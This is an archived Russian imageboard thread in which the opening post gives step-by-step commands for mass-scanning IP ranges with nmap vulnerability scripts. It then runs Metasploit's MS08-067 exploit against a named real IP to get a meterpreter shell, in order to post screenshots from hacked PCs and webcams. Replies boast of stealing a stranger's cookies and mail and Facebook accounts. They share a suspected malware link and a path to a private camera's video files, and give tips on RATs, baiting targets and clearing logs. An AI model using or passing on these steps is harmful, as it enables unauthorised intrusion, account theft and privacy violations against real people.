Этого треда уже нет.
Это копия, сохраненная 23 марта 2018 года.
Скачать тред: только с превью, с превью и прикрепленными файлами.
Второй вариант может долго скачиваться. Файлы будут только в живых или недавно утонувших тредах. Подробнее
Если вам полезен архив М.Двача, пожертвуйте на оплату сервера.
Это копия, сохраненная 23 марта 2018 года.
Скачать тред: только с превью, с превью и прикрепленными файлами.
Второй вариант может долго скачиваться. Файлы будут только в живых или недавно утонувших тредах. Подробнее
Если вам полезен архив М.Двача, пожертвуйте на оплату сервера.
Сап х@рk@4 ! Х@kеP0v тред.
Задание - пилим скрины, интересные фото и тп со взломаных ПК/Серверов/Облачных хранилищ/Web КАМЕР
Инструкция: качаем nmap и metasploit
Создадим папку скан.
В ней:
создадим файл ips.txt со списком диапазонов ip адресов
В терминале
nmap -p 21,139,445,145 --open --script smb-vuln-ms17-010,smb-vuln-ms10-061,smb-vuln-ms10-054,smb-vuln-ms08-067,smb-vuln-ms07-029,smb-vuln-ms06-025,smb-vuln-cve-2017-7494,smb-vuln-cve2009-3103,ftp-vsftpd-backdoor,ftp-proftpd-backdoor,ftp-anon -T4 -iL ips.txt -oN out.txt
Все данные будут переть в out.txt
Там ищем что-то похожее на
Nmap scan report for 5-248-21-106.broadband.kyivstar.net (5.248.21.106)
Host is up (0.018s latency).
Not shown: 2 closed ports, 1 filtered port
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Отсюда мы выпиливаем ip и имя дырки smb-vuln-ms08-067
Открываем метасплоит
search mb-vuln-ms08-067
use exploit/windows/smb/ms08_067_netapi
set rhost 5.248.21.106
run
!?!?!?!??!?!?!?!?PROFIT?!?!?!??!?!?!Ё?!??!?!
Если увидели
meterpreter >
Вы внутри.
Если нет ищите другой комп.
Стартуем!
Задание - пилим скрины, интересные фото и тп со взломаных ПК/Серверов/Облачных хранилищ/Web КАМЕР
Инструкция: качаем nmap и metasploit
Создадим папку скан.
В ней:
создадим файл ips.txt со списком диапазонов ip адресов
В терминале
nmap -p 21,139,445,145 --open --script smb-vuln-ms17-010,smb-vuln-ms10-061,smb-vuln-ms10-054,smb-vuln-ms08-067,smb-vuln-ms07-029,smb-vuln-ms06-025,smb-vuln-cve-2017-7494,smb-vuln-cve2009-3103,ftp-vsftpd-backdoor,ftp-proftpd-backdoor,ftp-anon -T4 -iL ips.txt -oN out.txt
Все данные будут переть в out.txt
Там ищем что-то похожее на
Nmap scan report for 5-248-21-106.broadband.kyivstar.net (5.248.21.106)
Host is up (0.018s latency).
Not shown: 2 closed ports, 1 filtered port
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Отсюда мы выпиливаем ip и имя дырки smb-vuln-ms08-067
Открываем метасплоит
search mb-vuln-ms08-067
use exploit/windows/smb/ms08_067_netapi
set rhost 5.248.21.106
run
!?!?!?!??!?!?!?!?PROFIT?!?!?!??!?!?!Ё?!??!?!
Если увидели
meterpreter >
Вы внутри.
Если нет ищите другой комп.
Стартуем!
Все в тихий дом, нетсталкер на дваче
Как хакир видит сибя и как хакир выглядет на самам дели
>>30334
Сяпки)))) это точно тот самый вирус?))
>https://transfer.sh/12unMp/CYBERed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.EXE
Сяпки)))) это точно тот самый вирус?))
325 Кб, 1366x768
>>30537
Валерий Данилович его зовут он с хохленда)))
Слил куки с его кома. Там майл акк и акк фэйсбука был)
Валерий Данилович его зовут он с хохленда)))
Слил куки с его кома. Там майл акк и акк фэйсбука был)
>>30603
спасиб бро)
спасиб бро)
>>30658
просто так
просто так
мож на комп залить архив гей порно?)
>>27027 (OP)
загугли что такое скрипткидди, скрипткидди
загугли что такое скрипткидди, скрипткидди
Че за хуйня? Я запускаю сплоит. Он дает сессию метерпретер, через пару сек сессия обрывается и больше подкл не могу
Скрина моего экрана пока нет. Это хорошо.
254 Кб, 1024x1024
Скачал в сети русский пул адресов. Попробуем что там ОП наобещал.
>>35630
Я ни с кем не сотрудничаю, тов.майор
Я ни с кем не сотрудничаю, тов.майор
>>37179
Это всё проход host-*.pppoe.omsknet.ru
Это всё проход host-*.pppoe.omsknet.ru
>>37179
В Украине быстро нашлись уязвимые сервисы.
В Украине быстро нашлись уязвимые сервисы.
Первый раз в жизни запустил msfconsole. Для него нужно поднимать и настраивать PostgreSQL или продолжить использовать так?
>>39448
Host script results:
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
Host script results:
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
>>39501
Nmap scan report for 5.53.118.50
Host is up (0.084s latency).
Not shown: 3 closed ports
PORT STATE SERVICE
139/tcp open netbios-ssn
Nmap scan report for 5.53.118.50
Host is up (0.084s latency).
Not shown: 3 closed ports
PORT STATE SERVICE
139/tcp open netbios-ssn
>>27027 (OP)
Ты по каким материалам учился? Тоже хочу стать какером
Ты по каким материалам учился? Тоже хочу стать какером
>>39857
Можешь несколько подобных подсетей задавать. Только пробел между ними ставь. А без -iL можно ip прямо в консоль подавать.
Можешь несколько подобных подсетей задавать. Только пробел между ними ставь. А без -iL можно ip прямо в консоль подавать.
>>39250
и без него можно
и без него можно
эээээ блдядь вы как мой рабочий стол сфотакали????!!!!!
Кстати ОП, а чем лучше всего под Linux'ом (можно через Wine) открывать найденный вебки?
>>40078
Нет пока, я скачал курс по информационной безопасности вчера. Секреты Хакеров называется, пока выучил первые три части, но там только теория, практика (в том числе ganu linux) ближе к концу. Что про линукс посоветуешь?
Нет пока, я скачал курс по информационной безопасности вчера. Секреты Хакеров называется, пока выучил первые три части, но там только теория, практика (в том числе ganu linux) ближе к концу. Что про линукс посоветуешь?
>>40016
И я не ОП. Так что извини, не подскажу
И я не ОП. Так что извини, не подскажу
>>40109
Хуево, я немецкий учил. Надо на инглиш пепеходить
Хуево, я немецкий учил. Надо на инглиш пепеходить
>>40227
Да я ничего не могу тебе подсказать. Тебе бы надо с ОПом связаться. Он подскажет думаю. Он вроде грамотный чувак-то
Да я ничего не могу тебе подсказать. Тебе бы надо с ОПом связаться. Он подскажет думаю. Он вроде грамотный чувак-то
ghjgecr d extremepron
>>40227
Я просто как вышла 8-ка укатился на Ubuntu, затем на Linux Mint, потом был Manjaro и сейчас уже 4 года на Arch Linux.
Просто если ты хоть немного попользуешься Linux'ом как основной системой, то современем даже Windows начинаешь лучше понимать.
Я просто как вышла 8-ка укатился на Ubuntu, затем на Linux Mint, потом был Manjaro и сейчас уже 4 года на Arch Linux.
Просто если ты хоть немного попользуешься Linux'ом как основной системой, то современем даже Windows начинаешь лучше понимать.
>>40317
я оп
я оп
>>40490
Для просто исп - Deepin
Для исп и работы - Ubuntu/Mint
Для взлома Kali но я исп Mint
В принципе в дистрибутивы похожи, и там все одинаково, разница в пакетах предустановленных и оболочке
Для просто исп - Deepin
Для исп и работы - Ubuntu/Mint
Для взлома Kali но я исп Mint
В принципе в дистрибутивы похожи, и там все одинаково, разница в пакетах предустановленных и оболочке
>>40653
Секрет прост - гайды от бубунты катят на mint или любой др дистрибутив и наоборот. Потому что это сук линукс. Мимо прыщевод с 4 уровневым стажем
Секрет прост - гайды от бубунты катят на mint или любой др дистрибутив и наоборот. Потому что это сук линукс. Мимо прыщевод с 4 уровневым стажем
>>40791
Просто Linux Mint вносит дополнительные особенности для понимания. Пользователь должен сам перейти от Ubuntu к другим дистрам после оценки своих потребностей.
Просто Linux Mint вносит дополнительные особенности для понимания. Пользователь должен сам перейти от Ubuntu к другим дистрам после оценки своих потребностей.
>>27027 (OP)
Я что-то гляжу, по этим уязвимостям не попасть на комп с последними обновами. Может кто подкинуть ссыль, где можно свежие эксплойты найти?
Я что-то гляжу, по этим уязвимостям не попасть на комп с последними обновами. Может кто подкинуть ссыль, где можно свежие эксплойты найти?
>>40963
ну, да, все сперва бубунту ставили) ктот на ней до сих пор) Можно минт сразу ставить, он в исп простой и на винду похож.
Для фанатов эпл deepin
ну, да, все сперва бубунту ставили) ктот на ней до сих пор) Можно минт сразу ставить, он в исп простой и на винду похож.
Для фанатов эпл deepin
Холодец за щеку этой шкуре
>>41023
угощайтес https://www.exploit-db.com/
Хз-хз у меня сканер дохуя дырявых компов дал, мне прост чекать надоело) зава продолжу)
угощайтес https://www.exploit-db.com/
Хз-хз у меня сканер дохуя дырявых компов дал, мне прост чекать надоело) зава продолжу)
>>41361
5.1.0.88
5.1.0.88
>>41419
Хз. Просто гулял по ftp-шникам и наткнулся на это.
Хз. Просто гулял по ftp-шникам и наткнулся на это.
Слышьте хацкеры, как на винде 8 настроить чтобы рабочий стол был статичен на 2х мониторах с 2мя разными обоинами. Как только выбираю 2 обоины включается режим слайд-шоу.
Да, меня унижает мой же ПК
Да, меня унижает мой же ПК
35 Кб, 474x682
А вот тут мне удалось создать папку. Кейс атаки следующий: кидаем ему патченную версию Хрома для Android.
>>41598
Не буду палить адрес. Теперь надо только научиться модифицировать apk-шки и освоить программирование под Android.
Не буду палить адрес. Теперь надо только научиться модифицировать apk-шки и освоить программирование под Android.
>>41086
Так тебе же всяких унылых рандомов выдаёт. А если на определённый комп надо?
>Хз-хз у меня сканер дохуя дырявых компов дал, мне прост чекать надоело) зава продолжу)
Так тебе же всяких унылых рандомов выдаёт. А если на определённый комп надо?
Как там скрипткидди итт поживают? На школьные кудахтеры ратники поставили уже? Я вот да.
>>41685
определенный труднее, тут соц инженерия нужна, троянчика подкинуть, ну там ссылка на сайт, письмо на мыло, иногда помогает флэшку у двери кинуть)))
определенный труднее, тут соц инженерия нужна, троянчика подкинуть, ну там ссылка на сайт, письмо на мыло, иногда помогает флэшку у двери кинуть)))
>>41936
збсь)
збсь)
>>42111
клуб кулц хацкеров ур скрипт кидди.
Кто взламывет компы украинских бабулек, кто видео сервера, кто веб камеры ноутов))))
клуб кулц хацкеров ур скрипт кидди.
Кто взламывет компы украинских бабулек, кто видео сервера, кто веб камеры ноутов))))
Бл, жаль уже не найду, сохранять над былО) там огромный архив порнухи)))
281 Кб, 1280x960
>>42668
Ага. Только мне не слишком завидно. Что-то мне хочется прочитать что-нибудь про хакерскую этику.
Ага. Только мне не слишком завидно. Что-то мне хочется прочитать что-нибудь про хакерскую этику.
Meterpreter устаревшее говно. Юзай Empire. А твоя самба - туда же. Есть FuzzBunch.
Мимо-тот-самый-кун-эксплоит-рдот
Мимо-тот-самый-кун-эксплоит-рдот
>>42770
Какая этика это двач)
Какая этика это двач)
>>43030
Moar --> ftp 5.104.56.157/mmcblk0p1/SD_VIDEO/PRL001
Moar --> ftp 5.104.56.157/mmcblk0p1/SD_VIDEO/PRL001
>>40490
зюзя.
зюзя.
Верните мне мой 2015...
>>43284
1. Не пиздить деньги.
2. Не вредить компу.
3. Не ломать граждан своей страны
4. VPN
5. Чистить логи на удаленном хосте/взломанном пк
6. Исп LiveUSB ос например кали и грузится онли через флэху. Ибо вся инфа хранится в оперативе и после перезагрузки стирается без шанса на восстановление
1. Не пиздить деньги.
2. Не вредить компу.
3. Не ломать граждан своей страны
4. VPN
5. Чистить логи на удаленном хосте/взломанном пк
6. Исп LiveUSB ос например кали и грузится онли через флэху. Ибо вся инфа хранится в оперативе и после перезагрузки стирается без шанса на восстановление
>>43445
бля редко тян нахожу((
бля редко тян нахожу((
>>43554
а хотелось
а хотелось
>>43677
я до сих пор джабером пользуюсь. У меня на удаленном хосте сервер жабы стоит)
я до сих пор джабером пользуюсь. У меня на удаленном хосте сервер жабы стоит)
забавно во взломе самое важное - опыт. Чем больше опыта, тем больше шансов взломать. Когда начинал я мог день на сканирование диапозона потратить и не взломать ни одного хоста. Теперь за 30 мин 4 хоста вскрываю)
Эх, были люди в наше время...
какие профиты с этого поиметь можно? Вот взламываю комп а цели то нету. Максимум скрин сделаю или порно залью на раб стол...
Как наши предки жили так долго вместе?
>>43902
тогда я знал только один способ проникнуть. Теперь кучу. Вообще мышление изменилось.
тогда я знал только один способ проникнуть. Теперь кучу. Вообще мышление изменилось.
52 Кб, 475x635
Сяомипидор в треде
>>44122
в ручную, это от оооочень многого зависит, где как и когда следил, какая ос, версия, дырка, сплоит, полезная нагрузка и тп. Универсального способа нет. Да и надо оно тебе. Среднестатистический продвинутый юзер пеки не знает даж где они лежат
в ручную, это от оооочень многого зависит, где как и когда следил, какая ос, версия, дырка, сплоит, полезная нагрузка и тп. Универсального способа нет. Да и надо оно тебе. Среднестатистический продвинутый юзер пеки не знает даж где они лежат
>>27027 (OP)
Объясните далекому от этой темы, почему smb так активно не эксплуатировался до последней найденной уязвимости.
Объясните далекому от этой темы, почему smb так активно не эксплуатировался до последней найденной уязвимости.
>>44344
Потому что в сеть проник не proof-of-concept, а сразу готовый эксплоит.
Потому что в сеть проник не proof-of-concept, а сразу готовый эксплоит.
>>44344
всегда исп, просто етерналблю шуму с ваннакраем наделала)
всегда исп, просто етерналблю шуму с ваннакраем наделала)
Сейчас бы со своего пк сканить мммм кайф
Фарму в массы abc
Фарму в массы abc
>>44757
ЦЕРКОВЬ ТNРЕЧА призываю тебя в тред дабы исправить сию фотографию.
ЦЕРКОВЬ ТNРЕЧА призываю тебя в тред дабы исправить сию фотографию.
Бамп хакерам
Вот вам лолю и копателя, бамп.
>>48210
пкм → создать папку ))))0
пкм → создать папку ))))0
может кто-то vpn посоветует?
>>27027 (OP)
Где качать metasploit , браузер отказывается, пишет что вирусный и опасный.
Где качать metasploit , браузер отказывается, пишет что вирусный и опасный.
>>42848
Теперь это баттхерт тред, лол.
> 3 пик
> даже у него есть тян
> тян беспалевно держит ероху за руку
Теперь это баттхерт тред, лол.
>>49090
Действительно странно.
Действительно странно.
Тред утонул или удален.
Это копия, сохраненная 23 марта 2018 года.
Скачать тред: только с превью, с превью и прикрепленными файлами.
Второй вариант может долго скачиваться. Файлы будут только в живых или недавно утонувших тредах. Подробнее
Если вам полезен архив М.Двача, пожертвуйте на оплату сервера.
Это копия, сохраненная 23 марта 2018 года.
Скачать тред: только с превью, с превью и прикрепленными файлами.
Второй вариант может долго скачиваться. Файлы будут только в живых или недавно утонувших тредах. Подробнее
Если вам полезен архив М.Двача, пожертвуйте на оплату сервера.